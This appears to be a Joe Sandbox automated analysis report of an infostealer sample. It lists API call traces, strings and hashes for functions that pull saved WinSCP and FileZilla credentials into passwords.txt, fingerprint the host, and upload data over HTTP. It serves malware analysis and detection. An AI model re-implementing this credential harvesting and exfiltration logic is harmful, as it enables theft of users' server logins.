StrCmpCA.SHLWAPI(?,00427B3E), ref: 0040C898
lstrcat.KERNEL32(00421610,00000000), ref: 0040C8D3
lstrcat.KERNEL32(00421610,00427E80), ref: 0040C8ED
lstrcat.KERNEL32(00421610,00427E84), ref: 0040C8FC
RegEnumKeyExA.ADVAPI32(000000FF,00000001,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C921

Part of subcall function 00411C10: wsprintfA.USER32 ref: 00411C2B

memset.MSVCRT ref: 0040C932
memset.MSVCRT ref: 0040C940
lstrlen.KERNEL32(00421610), ref: 0040C958
memset.MSVCRT ref: 0040C9AB

Strings

UserName, xrefs: 0040C82E
Security, xrefs: 0040C698
passwords.txt, xrefs: 0040C96B
Login: , xrefs: 0040C811
Host: , xrefs: 0040C755
HostName, xrefs: 0040C772
:22, xrefs: 0040C7F3
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040C61B
UseMasterPassword, xrefs: 0040C693
PortNumber, xrefs: 0040C7A3
Password, xrefs: 0040C86E
Soft: WinSCP, xrefs: 0040C746
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040C6CC
Password: , xrefs: 0040C880

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$Value$EnumHeapOpen$AllocProcesslstrlenwsprintf
String ID: :22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 4109173386-1250616252
Opcode ID: dc3298bc845ddf6c22293eff1231b26737cd44cf51dda0dba3085e02b0da23e4
Instruction ID: 39ec2e8349ec0f49430afd06625ec9b021e02694a525698c05ba917c3cb00e0c
Opcode Fuzzy Hash: dc3298bc845ddf6c22293eff1231b26737cd44cf51dda0dba3085e02b0da23e4
Instruction Fuzzy Hash: 51D17AB190021AEBDB10DBE4DC95EFFB77CEB48708F50459AF615A3280D6785E488B74

Uniqueness

Uniqueness Score: -1.00%

Function 00404DD0 Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 810
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E56

Part of subcall function 004117A0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 004117C4
Part of subcall function 004117A0: GetProcessHeap.KERNEL32(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117D3
Part of subcall function 004117A0: RtlAllocateHeap.NTDLL(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117DA

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

StrCmpCA.SHLWAPI(?,0152F518,004278A7,004278A3,0042789B,00427897,00427896), ref: 00404EE1
InternetOpenA.WININET(00000000,00000001,?,?,?), ref: 00404F07
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405031
HttpOpenRequestA.WININET(00000000,0152F488,?,01532148,00000000,00000000,-00400100,00000000), ref: 00405072
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405098

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,0152EAA8,00000000,?,00427960,00000000,?,?), ref: 00405590
lstrlen.KERNEL32(00000000), ref: 004055A2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004055B5
HeapAlloc.KERNEL32(00000000), ref: 004055BC
lstrlen.KERNEL32(00000000), ref: 004055CE
memcpy.MSVCRT ref: 004055E2
lstrlen.KERNEL32(00000000,?,?), ref: 004055FB
memcpy.MSVCRT ref: 00405605
lstrlen.KERNEL32(00000000), ref: 00405616
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040562F
memcpy.MSVCRT ref: 0040563C
lstrlen.KERNEL32(00000000,?,00000000), ref: 00405652
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405663
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040568B
InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 004056D4
InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 0040572B
StrCmpCA.SHLWAPI(00000000,block), ref: 00405743
ExitProcess.KERNEL32 ref: 0040574E
InternetCloseHandle.WININET(00000000), ref: 0040575F

Strings

", xrefs: 0040555E
block, xrefs: 00405735
", xrefs: 00405417
------, xrefs: 0040509E
ERROR, xrefs: 00405832
------, xrefs: 004051E7
file_data, xrefs: 00405535
------, xrefs: 00404F60
", xrefs: 0040516D
0, xrefs: 00405706
", xrefs: 004052B5
--, xrefs: 00404F87
ERROR, xrefs: 00405698
build_id, xrefs: 0040528C
------, xrefs: 00405348
------, xrefs: 00405491

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$FileOpenReadRequestlstrcat$AllocAllocateBinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$block$build_id$file_data
API String ID: 1135472144-3618031631
Opcode ID: e815b3ad2264143bb48ae0f0fc906797d55cb53abbd96dc878e8bdd3ba56be44
Instruction ID: db5541188cdc9f639a804d86c40747d3c4d91d865bd81aad25c9fe7a46c42329
Opcode Fuzzy Hash: e815b3ad2264143bb48ae0f0fc906797d55cb53abbd96dc878e8bdd3ba56be44
Instruction Fuzzy Hash: 20624471800249EADB15EBE5C951BEEBBB8AF19304F5041AEF50173182DE786B4CCB79

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9F0 Relevance: 73.9, APIs: 31, Strings: 11, Instructions: 401
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00406E40: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
Part of subcall function 00406E40: GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
Part of subcall function 00406E40: LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
Part of subcall function 00406E40: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
Part of subcall function 00406E40: CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

strtok_s.MSVCRT ref: 0040CAE9
GetProcessHeap.KERNEL32(00000000,000F423F,00427B47,00427B46,00427B43,00427B42), ref: 0040CB3F
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CB46
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CB66
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CB71

Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CBA8
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBB3
StrStrA.SHLWAPI(00000000,<User>), ref: 0040CBF0
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBFB
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CC38
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CC47
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCD3
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCEB
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD03
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD1B
lstrcat.KERNEL32(?,Soft: FileZilla), ref: 0040CD33
lstrcat.KERNEL32(?,Host: ), ref: 0040CD42
lstrcat.KERNEL32(?,00000000), ref: 0040CD55
lstrcat.KERNEL32(?,00427F1C), ref: 0040CD64
lstrcat.KERNEL32(?,00000000), ref: 0040CD77
lstrcat.KERNEL32(?,00427F20), ref: 0040CD86
lstrcat.KERNEL32(?,Login: ), ref: 0040CD95
lstrcat.KERNEL32(?,00000000), ref: 0040CDA8
lstrcat.KERNEL32(?,00427F2C), ref: 0040CDB7
lstrcat.KERNEL32(?,Password: ), ref: 0040CDC6
lstrcat.KERNEL32(?,00000000), ref: 0040CDD9
lstrcat.KERNEL32(?,00427F3C), ref: 0040CDE8
lstrcat.KERNEL32(?,00427F40), ref: 0040CDF7

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

strtok_s.MSVCRT ref: 0040CE3B
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CE51
memset.MSVCRT ref: 0040CEA5

Strings

Login: , xrefs: 0040CD8F
<Port>, xrefs: 0040CBA2
Host: , xrefs: 0040CD3C
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040CA75
<Host>, xrefs: 0040CB60
passwords.txt, xrefs: 0040CE64
Password: , xrefs: 0040CDC0
Soft: FileZilla, xrefs: 0040CD2D
O{BN{BK{B, xrefs: 0040CE1C
<User>, xrefs: 0040CBEA
<Pass encoding="base64">, xrefs: 0040CC32

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $O{BN{BK{B$Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 433178851-1966776650
Opcode ID: 553205438ed012d35cce61669005fd022498ce32dc9c1b61e4ae1c0d2a1abc7d
Instruction ID: d3b6116b1b73df3cabd5054aa1a62d8a43f82c6421f78d5ef7e496df56dda141
Opcode Fuzzy Hash: 553205438ed012d35cce61669005fd022498ce32dc9c1b61e4ae1c0d2a1abc7d
Instruction Fuzzy Hash: 3CE1A175904219EACB04EBA0DC56BEEBB78AF19304F50056EF901731C2DF786A48C769

Uniqueness

Uniqueness Score: -1.00%

Function 00405C90 Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 684
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D5A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F04
HttpOpenRequestA.WININET(00000000,0152F488,?,01532148,00000000,00000000,-00400100,00000000), ref: 00405F44
lstrlen.KERNEL32(00000000,00000000,004205B9,?,00000000,004205B9,",00000000,004205B9,mode,00000000,004205B9,0152EAA8,00000000,004205B9,004279E8), ref: 00406342
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406353
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040635E
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406365
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406376
memcpy.MSVCRT ref: 00406387
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406398
lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063B1
memcpy.MSVCRT ref: 004063BA
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004063CD
HttpSendRequestA.WININET(?,00000000,00000000), ref: 004063E1
InternetReadFile.WININET(?,?,000000C7,00000000), ref: 004063F8
InternetReadFile.WININET(?,00000000,000000C7,00000000), ref: 0040644E
InternetCloseHandle.WININET(?), ref: 00406459
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405F6B

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

InternetCloseHandle.WININET(00000000), ref: 00406466
InternetCloseHandle.WININET(00000000), ref: 00406470
StrCmpCA.SHLWAPI(?,0152F518,?,?,?,?,?,?,00000000), ref: 00405D7A

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Strings

*, xrefs: 00406525
mode, xrefs: 004062BF
build_id, xrefs: 0040615E
------, xrefs: 0040621A
------, xrefs: 00405DFF
", xrefs: 00406187
------, xrefs: 004060BA
", xrefs: 00406040
", xrefs: 004062E8
------, xrefs: 00405F71

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
String ID: "$"$"$*$------$------$------$------$build_id$mode
API String ID: 530647464-3630346487
Opcode ID: 295d76698cad3f0070742d993786b5cfb92bdf050978c5db47067aa722c3827c
Instruction ID: 80b1796918ec1c29b6be473428c1b8ad95fa748133d466919d2d563d3e35a917
Opcode Fuzzy Hash: 295d76698cad3f0070742d993786b5cfb92bdf050978c5db47067aa722c3827c
Instruction Fuzzy Hash: 1A526271801249EADB15E7E5C952BEEBBB89F19304F2440AEF50173182DE786B4CCB79

Uniqueness

Uniqueness Score: -1.00%

Function 004158F0 Relevance: 50.0, APIs: 2, Strings: 26, Instructions: 1038
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410300: GetProcessHeap.KERNEL32(00000000,00000104,?,004283B0,00000000,?,00000000,00000000), ref: 0041030E
Part of subcall function 00410300: HeapAlloc.KERNEL32(00000000,?,004283B0,00000000,?,00000000,00000000), ref: 00410315
Part of subcall function 00410300: GetLocalTime.KERNEL32(004283B0,?,004283B0,00000000,?,00000000,00000000), ref: 00410321
Part of subcall function 00410300: wsprintfA.USER32 ref: 0041034D

Part of subcall function 00410C90: memset.MSVCRT ref: 00410CB5
Part of subcall function 00410C90: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410CD2
Part of subcall function 00410C90: RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410CF4
Part of subcall function 00410C90: CharToOemA.USER32(00000000,?), ref: 00410D12

Part of subcall function 00410D30: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45

Part of subcall function 00410D90: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
Part of subcall function 00410D90: GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
Part of subcall function 00410D90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
Part of subcall function 00410D90: HeapAlloc.KERNEL32(00000000), ref: 00410E54

GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004283E8,00000000,?,00000000,00000000,00000000,00000000), ref: 00415C2B

Part of subcall function 00411A40: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411A5C
Part of subcall function 00411A40: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411A77
Part of subcall function 00411A40: CloseHandle.KERNEL32(00000000), ref: 00411A7E

Part of subcall function 00410F40: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410F55
Part of subcall function 00410F40: HeapAlloc.KERNEL32(00000000), ref: 00410F5C

Part of subcall function 004110A0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4,00000000), ref: 004110C3
Part of subcall function 004110A0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C), ref: 004110D4
Part of subcall function 004110A0: CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000), ref: 004110EE
Part of subcall function 004110A0: CoSetProxyBlanket.OLE32(004283F4,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000), ref: 00411127
Part of subcall function 004110A0: VariantInit.OLEAUT32(?), ref: 00411186

Part of subcall function 00411260: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 00411283
Part of subcall function 00411260: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430), ref: 00411294
Part of subcall function 00411260: CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 004112AE
Part of subcall function 00411260: CoSetProxyBlanket.OLE32(00428430,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000), ref: 004112E7
Part of subcall function 00411260: VariantInit.OLEAUT32(?), ref: 00411342

Part of subcall function 004102C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,01522EC0,0041887F), ref: 004102CC
Part of subcall function 004102C0: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,01522EC0,0041887F), ref: 004102D3
Part of subcall function 004102C0: GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7

Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,01522DE0,?,00401074,01522DE0,?,0041887F), ref: 0041028C
Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,01522DE0,?,00401074,01522DE0,?,0041887F), ref: 00410293
Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,01522DE0), ref: 004102A7

Part of subcall function 00410C10: CreateDCA.GDI32(01522EA0,00000000,00000000,00000000), ref: 00410C2A
Part of subcall function 00410C10: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410C35
Part of subcall function 00410C10: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410C40
Part of subcall function 00410C10: ReleaseDC.USER32(00000000,00000000), ref: 00410C4B
Part of subcall function 00410C10: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000), ref: 00410C58
Part of subcall function 00410C10: HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000,?), ref: 00410C5F
Part of subcall function 00410C10: wsprintfA.USER32 ref: 00410C6F

Part of subcall function 004103D0: GetKeyboardLayoutList.USER32(00000000,00000000,004280A7,?,?,00000001), ref: 00410417
Part of subcall function 004103D0: LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 00410429
Part of subcall function 004103D0: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 00410434
Part of subcall function 004103D0: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466
Part of subcall function 004103D0: LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A

Part of subcall function 00410360: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410371
Part of subcall function 00410360: HeapAlloc.KERNEL32(00000000), ref: 00410378
Part of subcall function 00410360: GetTimeZoneInformation.KERNEL32(?), ref: 00410387
Part of subcall function 00410360: wsprintfA.USER32 ref: 004103B2

Part of subcall function 00410530: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410545
Part of subcall function 00410530: HeapAlloc.KERNEL32(00000000), ref: 0041054C
Part of subcall function 00410530: RegOpenKeyExA.KERNEL32(80000002,0152B6B0,00000000,00020119,00000000), ref: 0041056B
Part of subcall function 00410530: RegQueryValueExA.KERNEL32(00000000,015319E0,00000000,00000000,00000000,000000FF), ref: 00410586

Part of subcall function 004105E0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410602
Part of subcall function 004105E0: GetLastError.KERNEL32(?,?,00000001), ref: 00410610
Part of subcall function 004105E0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410648
Part of subcall function 004105E0: wsprintfA.USER32 ref: 00410692

Part of subcall function 004105A0: GetSystemInfo.KERNEL32(00000000), ref: 004105AD
Part of subcall function 004105A0: wsprintfA.USER32 ref: 004105C3

Part of subcall function 004106E0: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498), ref: 004106EE
Part of subcall function 004106E0: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498,00000000), ref: 004106F5
Part of subcall function 004106E0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410715
Part of subcall function 004106E0: wsprintfA.USER32 ref: 0041073B

Part of subcall function 00410750: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004107A7
Part of subcall function 00410750: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 00410834

Part of subcall function 00410B00: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410B4F
Part of subcall function 00410B00: Process32First.KERNEL32(00000000,00000128), ref: 00410B5F
Part of subcall function 00410B00: Process32Next.KERNEL32(00000000,00000128), ref: 00410B71
Part of subcall function 00410B00: Process32Next.KERNEL32(00000000,00000128), ref: 00410BDE
Part of subcall function 00410B00: CloseHandle.KERNEL32(00000000), ref: 00410BE9

Part of subcall function 00410860: RegOpenKeyExA.KERNEL32(00000000,01526398,00000000,00020019,00000000,004280BF,?,00000001), ref: 004108BF

